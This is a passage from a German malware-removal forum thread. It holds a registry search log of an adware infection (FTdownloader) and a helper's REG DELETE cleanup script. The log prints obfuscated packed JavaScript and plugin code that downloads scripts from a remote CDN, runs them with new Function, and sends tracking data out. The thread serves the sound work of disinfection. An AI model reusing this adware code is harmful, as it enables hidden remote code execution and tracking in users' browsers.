"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"
Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayIcon"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
Searching for " "
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000020]
"JavaScript"="try{
innergaq = {
accountStr: '',
arrToPush: new Array(),
create: function(q){
this.arrToPush.push(this.accountStr + (q ? "&" + q : ''));
},
//only after the back loaded - or else the appAPI wont be avilable
init: function (q, v, nm) {
var that = this;
this.accountStr = 'acc='+q + '&nm=' + nm;
appAPI.message.addListener(function(msg) {
that.onRequest(msg);
});
if (appAPI.db.get("au") == util.getCurrentDate()) {
//console.log('exit- no need to use plugin');
return;
}
function updateAUser(){
var install = appAPI.db.get("install") || util.getCurrentDate();
that.create('action=_setCustomVar&index=2&name=Install%20Date&value=' + decodeURIComponent(install) + '&opt_scope=1' );
var cnt = appAPI.db.get("cnt");
if (!cnt || cnt == "" || cnt == undefined) {
util.request("hxxp://ext.extdaddy.com/cc
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000027]
"JavaScript"="injectorBack = {
js: "",
funcName: "",
count: 0,
type: "",
version: "",
setKey: function(key, value, cb){
appAPI.db.async.set(key , value, appAPI.time.hoursFromNow(6), cb);
},
activateCodeInTab: function (code){
appAPI.message.toActiveTab({"name": this.funcName, "version": this.version, "browser" : "ie", "type": this.type});
},
init: function (funcName, version, fileName) {
var that = this;
this.funcName = funcName;
this.type = fileName;
this.version = version;
appAPI.message.addListener(function(msg) {
switch (msg.name){
case "getAllKeys":
if (!utils.isCacheTimePass(6, utils.getCrntTime())) {
that.activateCodeInTab();
}
else {
appAPI.request.get({
url: msg.protocol + "//secureclick-media-maynemyltf.netdna-ssl.com/Extensions/rjs/" + fileName + "_c.js",
onS
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000028]
"JavaScript"="injector = {
init: function (listenerTriggeredOn) {
(function ($) {
var obj = {};
appAPI.message.addListener(function(msg) {
if(listenerTriggeredOn == msg.name){
var keys = [];
appAPI.db.async.getList(function(dbItems) {
for (var i = 0; i < dbItems.length; i++) {
keys[dbItems[i].key] = dbItems[i].value;
}
var country = keys.cnt || "";
var json = JSON || appAPI.JSON;
if(msg.type == "c2"){
var fn = new Function("exname", "cnt", "version", "broType", "dataKeys", json.parse(keys['js']));
fn(msg.name, country, msg.version , msg.browser, keys);
}
else if(msg.type == "htd"){
var fn = new Function("Datakeys", "btype", "exname", "cnt", "version", json.parse(keys['js']));
fn(keys, msg.browser, msg.name, country, msg.version);
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\102]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
appAPI.internal.monetization.plugins = {};
}
appAPI.internal.monetization.plugins[102] = function() {
if (typeof appAPI.internal.monetization.verticals !== "undefined") {
if (!appAPI.internal.monetization.verticals.shopping){
return;
}
}
/**
* Copyright (C) 2012 DealPly Technologies Ltd. All rights reserved. For licensing
* information, see hxxp://www.dealply.com/
*
* THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
* LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
* OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
* EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PUR
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\104]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
appAPI.internal.monetization.plugins = {};
}
appAPI.internal.monetization.plugins[104] = function() {
if (typeof appAPI.internal.monetization.verticals !== "undefined") {
if (!appAPI.internal.monetization.verticals.shopping){
return;
}
}
var permanentData = {gui:[],actions:[]};
var permanentCache = ["c822c1b63853ed273b89687ac505f9fa","738aa8d3bc02eb8712acd0eb2cf6dfd5","2351f600bf62102c56b3941c39225683","16524241cd11b1b1c6b3ab30874047d6","241fe8af1e038118cd817048a65f803e","5ed33f7008771c9d49e3716aeaeca581","e50173d2983f028042965a37357931fc","8e1b7a68ae2f404bfafaafd53d293cde","dc29a383b9b0932dbd9f75e4af9b51f5","f4c4b31d11e30ca1511d807c10cd68f3","8862aa846eeafd1f61c5ad22580d0148","b53e20c91b81ec25a6d06d4cf351d0b2","1f89d526fc52417e16d99b9f0
[HKEY_LOCAL_MACHINE\SOFTWARE\Dell Computer Corporation\SysInfo]
"System Manufacturer"="Dell Inc. "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML"=" <PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" > <InitializationParameters> <Param Name="PSVersion" Value="2.0"/> </InitializationParameters> <Resources> <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" SupportsOptions="true" ExactMatch="true"> <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/> <Capability Type="Shell"/> </Resource> </Res
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell32]
"ConfigXML"="<PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell32" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" Architecture="32" > <InitializationParameters> <Param Name="PSVersion" Value="2.0"/> </InitializationParameters> <Resources> <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" SupportsOptions="true" ExactMatch="true"> <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Live\Common]
"Manufacturer"="Dell Inc. "
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000020]
"JavaScript"="try{
innergaq = {
accountStr: '',
arrToPush: new Array(),
create: function(q){
this.arrToPush.push(this.accountStr + (q ? "&" + q : ''));
},
//only after the back loaded - or else the appAPI wont be avilable
init: function (q, v, nm) {
var that = this;
this.accountStr = 'acc='+q + '&nm=' + nm;
appAPI.message.addListener(function(msg) {
that.onRequest(msg);
});
if (appAPI.db.get("au") == util.getCurrentDate()) {
//console.log('exit- no need to use plugin');
return;
}
function updateAUser(){
var install = appAPI.db.get("install") || util.getCurrentDate();
that.create('action=_setCustomVar&index=2&name=Install%20Date&value=' + decodeURIComponent(install) + '&opt_scope=1' );
var cnt = appAPI.db.get("cnt");
if (!cnt || cnt == "" || cnt == undefined) {
u
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000027]
"JavaScript"="injectorBack = {
js: "",
funcName: "",
count: 0,
type: "",
version: "",
setKey: function(key, value, cb){
appAPI.db.async.set(key , value, appAPI.time.hoursFromNow(6), cb);
},
activateCodeInTab: function (code){
appAPI.message.toActiveTab({"name": this.funcName, "version": this.version, "browser" : "ie", "type": this.type});
},
init: function (funcName, version, fileName) {
var that = this;
this.funcName = funcName;
this.type = fileName;
this.version = version;
appAPI.message.addListener(function(msg) {
switch (msg.name){
case "getAllKeys":
if (!utils.isCacheTimePass(6, utils.getCrntTime())) {
that.activateCodeInTab();
}
else {
appAPI.request.get({
url: msg.protocol + "//secureclick-media-maynemyltf.netdna-ssl.com/Extensions/rjs/"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000028]
"JavaScript"="injector = {
init: function (listenerTriggeredOn) {
(function ($) {
var obj = {};
appAPI.message.addListener(function(msg) {
if(listenerTriggeredOn == msg.name){
var keys = [];
appAPI.db.async.getList(function(dbItems) {
for (var i = 0; i < dbItems.length; i++) {
keys[dbItems[i].key] = dbItems[i].value;
}
var country = keys.cnt || "";
var json = JSON || appAPI.JSON;
if(msg.type == "c2"){
var fn = new Function("exname", "cnt", "version", "broType", "dataKeys", json.parse(keys['js']));
fn(msg.name, country, msg.version , msg.browser, keys);
}
else if(msg.type == "htd"){
var fn = new Function("Datakeys", "btype", "exname", "cnt", "version", json.parse(keys['js']));
fn(keys, msg.browse
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\102]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
appAPI.internal.monetization.plugins = {};
}
appAPI.internal.monetization.plugins[102] = function() {
if (typeof appAPI.internal.monetization.verticals !== "undefined") {
if (!appAPI.internal.monetization.verticals.shopping){
return;
}
}
/**
* Copyright (C) 2012 DealPly Technologies Ltd. All rights reserved. For licensing
* information, see hxxp://www.dealply.com/
*
* THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
* LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
* OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
* EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTA
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\104]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
appAPI.internal.monetization.plugins = {};
}
appAPI.internal.monetization.plugins[104] = function() {
if (typeof appAPI.internal.monetization.verticals !== "undefined") {
if (!appAPI.internal.monetization.verticals.shopping){
return;
}
}
var permanentData = {gui:[],actions:[]};
var permanentCache = ["c822c1b63853ed273b89687ac505f9fa","738aa8d3bc02eb8712acd0eb2cf6dfd5","2351f600bf62102c56b3941c39225683","16524241cd11b1b1c6b3ab30874047d6","241fe8af1e038118cd817048a65f803e","5ed33f7008771c9d49e3716aeaeca581","e50173d2983f028042965a37357931fc","8e1b7a68ae2f404bfafaafd53d293cde","dc29a383b9b0932dbd9f75e4af9b51f5","f4c4b31d11e30ca1511d807c10cd68f3","8862aa846eeafd1f61c5ad22580d0148","b53e20c91b81ec25a6d06
-= EOF =-
|
|
13.08.2013, 13:20
| #25 |
| /// Winkelfunktion /// TB-Süch-Tiger™ | SpyHunter4 als Pc-Scanner... Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster. Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument Code:
ATTFilter reg: REG DELETE "HKCU\Software\AppDataLow\Software\FTdownloader V4.0" /f
reg: REG DELETE "HKLM\SOFTWARE\Classes\FTDownloader" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\FTdownloader V4.0" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp" /f
reg: REG DELETE "HKU\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{105ce2f6-6c71-4553-95db-0521a2c0f060" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4ac48e96-eb40-4792-9d9d-70d59d8754ba" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5935e203-f846-461d-89df-435059efcbb8" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{6419a700-23b8-46ea-800b-c0ea78e133a2" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9bc852d3-9d70-4611-9afc-016840417a4c" /f
